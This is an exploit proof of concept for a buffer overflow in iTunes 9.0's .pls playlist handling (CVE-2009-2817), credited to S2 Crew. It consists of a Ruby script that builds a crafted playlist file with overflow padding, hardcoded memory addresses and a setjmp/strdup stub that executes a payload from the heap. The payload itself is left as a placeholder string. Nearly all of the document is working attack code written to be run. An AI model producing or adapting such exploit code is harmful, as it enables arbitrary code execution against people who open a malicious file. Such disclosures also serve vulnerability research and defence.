# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2  (/GS flag, DOS)
# CVE: CVE-2009-2817

# Code:

#!/usr/bin/env ruby

SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459

def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
exec_payload_from_heap_stub =
frag0 +
[SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
frag1 +
"X" * 20 +
[SETJMP, JMP_BUF + 24, JMP_BUF, STRDUP,
JMP_EAX].pack("V5") +
"X" * 4
end

payload_cmd = "hereisthetrick"
stub = make_exec_payload_from_heap_stub()
ext = "A" * 59
stub = make_exec_payload_from_heap_stub()
exploit = ext + stub + payload_cmd

# pls file format

file = "[playlist]\n"
file += "NumberOfEntries=1\n"
file += "File1=http://1/asdf." + exploit + "\n"
file += "Title1=asdf\n"
file += "Length1=100\n"
file += "Version=2" + '\n'

File.open('poc.pls','w') do |f|
f.puts file
f.close
end
